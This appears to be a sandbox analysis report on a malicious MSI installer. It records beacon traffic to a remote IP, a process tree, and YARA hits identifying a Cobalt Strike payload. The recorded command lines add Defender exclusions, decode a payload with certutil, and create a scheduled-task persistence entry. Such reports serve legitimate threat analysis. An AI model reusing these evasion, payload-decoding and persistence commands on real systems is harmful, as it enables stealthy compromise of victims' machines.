Aug 4, 2024 10:50:50.015208960 CEST	59611	49738	45.76.192.215	192.168.2.8
Aug 4, 2024 10:50:50.015295029 CEST	49738	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:50.015656948 CEST	49738	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:50.020567894 CEST	59611	49738	45.76.192.215	192.168.2.8
Aug 4, 2024 10:50:54.020088911 CEST	49738	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:54.194236040 CEST	49739	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:54.199306965 CEST	59611	49739	45.76.192.215	192.168.2.8
Aug 4, 2024 10:50:54.199395895 CEST	49739	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:54.199721098 CEST	49739	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:54.204793930 CEST	59611	49739	45.76.192.215	192.168.2.8
Aug 4, 2024 10:50:58.207551956 CEST	49739	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:58.366895914 CEST	49740	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:58.371912956 CEST	59611	49740	45.76.192.215	192.168.2.8
Aug 4, 2024 10:50:58.372029066 CEST	49740	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:58.372375965 CEST	49740	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:50:58.377939939 CEST	59611	49740	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:02.382473946 CEST	49740	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:02.570283890 CEST	49741	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:02.575191975 CEST	59611	49741	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:02.577399969 CEST	49741	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:02.581600904 CEST	49741	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:02.586388111 CEST	59611	49741	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:06.582745075 CEST	49741	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:06.944405079 CEST	49742	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:06.949419975 CEST	59611	49742	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:06.949649096 CEST	49742	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:06.949932098 CEST	49742	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:06.955506086 CEST	59611	49742	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:10.957648039 CEST	49742	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:11.350573063 CEST	49743	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:11.355633974 CEST	59611	49743	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:11.355856895 CEST	49743	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:11.356260061 CEST	49743	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:11.361457109 CEST	59611	49743	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:15.363918066 CEST	49743	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:15.710807085 CEST	49744	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:15.715816975 CEST	59611	49744	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:15.715917110 CEST	49744	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:15.716217995 CEST	49744	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:15.720987082 CEST	59611	49744	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:19.723963022 CEST	49744	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:19.913882017 CEST	49745	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:19.918725967 CEST	59611	49745	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:19.918802977 CEST	49745	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:19.919157982 CEST	49745	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:19.924417973 CEST	59611	49745	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:23.926397085 CEST	49745	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:24.101556063 CEST	49746	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:24.106378078 CEST	59611	49746	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:24.106468916 CEST	49746	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:24.106847048 CEST	49746	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:24.111633062 CEST	59611	49746	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:28.113854885 CEST	49746	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:28.275830030 CEST	49747	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:28.280810118 CEST	59611	49747	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:28.280914068 CEST	49747	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:28.281357050 CEST	49747	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:28.286168098 CEST	59611	49747	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:32.287106037 CEST	49747	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:32.650163889 CEST	49748	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:32.655138016 CEST	59611	49748	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:32.655244112 CEST	49748	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:32.657282114 CEST	49748	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:32.662122011 CEST	59611	49748	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:36.661240101 CEST	49748	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:36.977849007 CEST	49749	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:36.982789040 CEST	59611	49749	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:36.983246088 CEST	49749	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:36.985608101 CEST	49749	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:36.990582943 CEST	59611	49749	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:40.974734068 CEST	49749	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:41.343538046 CEST	49750	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:41.348567963 CEST	59611	49750	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:41.349426985 CEST	49750	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:41.355314016 CEST	49750	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:41.360301971 CEST	59611	49750	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:45.348642111 CEST	49750	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:45.764175892 CEST	49751	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:45.769150972 CEST	59611	49751	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:45.769309998 CEST	49751	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:45.770570993 CEST	49751	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:45.775352955 CEST	59611	49751	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:49.770268917 CEST	49751	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:49.931689024 CEST	49752	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:49.938498020 CEST	59611	49752	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:49.938616037 CEST	49752	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:49.939024925 CEST	49752	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:49.943912029 CEST	59611	49752	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:53.942300081 CEST	49752	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:54.102262020 CEST	49753	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:54.107397079 CEST	59611	49753	45.76.192.215	192.168.2.8
Aug 4, 2024 10:51:54.107490063 CEST	49753	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:54.107887030 CEST	49753	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:51:54.112807035 CEST	59611	49753	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:15.498950005 CEST	59611	49753	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:15.502310038 CEST	49753	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:15.551208973 CEST	49753	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:15.556149006 CEST	59611	49753	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:15.748449087 CEST	49754	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:15.753662109 CEST	59611	49754	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:15.753737926 CEST	49754	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:15.754261971 CEST	49754	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:15.759474993 CEST	59611	49754	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:37.138608932 CEST	59611	49754	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:37.138957977 CEST	49754	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.142050982 CEST	49754	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.146836042 CEST	59611	49754	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:37.175380945 CEST	49755	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.180381060 CEST	59611	49755	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:37.183465958 CEST	49755	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.183582067 CEST	49755	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.189735889 CEST	59611	49755	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:37.189740896 CEST	59611	49755	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:37.190251112 CEST	49755	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.321218014 CEST	49756	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.326284885 CEST	59611	49756	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:37.326948881 CEST	49756	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.327385902 CEST	49756	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:37.332194090 CEST	59611	49756	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:58.723426104 CEST	59611	49756	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:58.727770090 CEST	49756	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:58.728212118 CEST	49756	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:58.733047009 CEST	59611	49756	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:58.778871059 CEST	49757	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:58.783879995 CEST	59611	49757	45.76.192.215	192.168.2.8
Aug 4, 2024 10:52:58.783967972 CEST	49757	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:58.784468889 CEST	49757	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:52:58.789443016 CEST	59611	49757	45.76.192.215	192.168.2.8
Aug 4, 2024 10:53:20.174412012 CEST	59611	49757	45.76.192.215	192.168.2.8
Aug 4, 2024 10:53:20.174660921 CEST	49757	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:53:20.174782991 CEST	49757	59611	192.168.2.8	45.76.192.215
Aug 4, 2024 10:53:20.179662943 CEST	59611	49757	45.76.192.215	192.168.2.8

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 4, 2024 10:49:14.712523937 CEST	1.1.1.1	192.168.2.8	0x5aa4	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Aug 4, 2024 10:49:14.712523937 CEST	1.1.1.1	192.168.2.8	0x5aa4	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	04:49:09
Start date:	04/08/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1eSOBjseu2.msi"
Imagebase:	0x7ff742d90000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:49:09
Start date:	04/08/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff742d90000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	04:49:10
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9
Imagebase:	0x280000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:49:11
Start date:	04/08/2024
Path:	C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"
Imagebase:	0x60000
File size:	894'464 bytes
MD5 hash:	10F3B7105634BEF29E229ECDA63E08C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:49:11
Start date:	04/08/2024
Path:	C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe"
Imagebase:	0x7ff7bb230000
File size:	684'087 bytes
MD5 hash:	D2733BF9C81DDF4F730C65FCE8E02629
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:49:12
Start date:	04/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "
Imagebase:	0x7ff6f8050000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:49:12
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:49:12
Start date:	04/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:49:12
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"
Imagebase:	0x350000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:49:13
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:49:15
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x350000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:49:15
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:49:15
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x350000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 3892, Parent PID: 1840

General

Target ID:	14
Start time:	04:49:15
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:49:16
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x350000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5652, Parent PID: 932

General

Target ID:	16
Start time:	04:49:16
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:49:16
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x350000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7456, Parent PID: 3756

General

Target ID:	18
Start time:	04:49:16
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:49:17
Start date:	04/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:49:19
Start date:	04/08/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe
Imagebase:	0x7ff7dc2e0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:49:19
Start date:	04/08/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f
Imagebase:	0x7ff6527d0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:49:19
Start date:	04/08/2024
Path:	C:\Users\Public\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\WmiPrvSE.exe
Imagebase:	0x400000
File size:	328'704 bytes
MD5 hash:	29FA5E4FD104FD12A870D2DD90E42B31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	375
Total number of Limit Nodes:	9

Executed Functions

Function 0006A7B0 Relevance: 34.3, APIs: 12, Strings: 7, Instructions: 1001threadsleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,0010C72A,?,?), ref: 0006B1A1
GetCurrentThreadId.KERNEL32 ref: 0006ADFB

Part of subcall function 000CB321: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,00000000,?,0006B45F,?,00000000,00000000,?,?,?,?,00000000,-00000002), ref: 000CB32D
